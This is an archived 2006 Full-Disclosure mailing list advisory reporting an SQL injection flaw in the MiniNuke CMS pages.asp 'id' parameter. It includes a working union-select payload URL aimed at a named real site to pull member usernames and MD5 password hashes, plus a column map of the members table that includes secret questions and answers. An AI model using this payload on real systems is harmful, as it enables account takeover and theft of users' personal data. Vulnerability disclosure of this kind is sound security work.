lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060219231742.98kkcvl9fcgs4sks@webmail.nukedx.com>
Date: Sun, 19 Feb 2006 23:17:42 +0200
From: nukedx@...edx.com
To: submit@...w0rm.com, full-disclosure@...ts.grok.org.uk,
	bugtraq@...urityfocus.com, orhankara@...lshosting.com,
	erdisari@...i-nuke.info
Subject: Advisory: MiniNuke CMS System all versions
	(pages.asp) SQL Injection vulnerability


--Security Report--
Advisory: MiniNuke CMS System all versions (pages.asp) SQL Injection
vulnerability
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 19/02/06 10:31 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@...edx.com
Web: http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net) (www.mini-nuke.info)
Version: All versions released from this vendors.
About:Via this method remote attacker can inject SQL query to the pages.asp
---
How&Example:
GET -> http://[site]/pages.asp?id=1%20[SQLQuery]
Example ->
http://www.eraymuzik.com/pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=1
So with this example remote attacker can get userid 52's hashed password.
Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar
--
Exploit:
http://www.nukedx.com/?getxpl=9
--
Original advisory:
http://www.nukedx.com/?viewdoc=9
--
>From the NWPX team,
nuker a.k.a nukedx

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ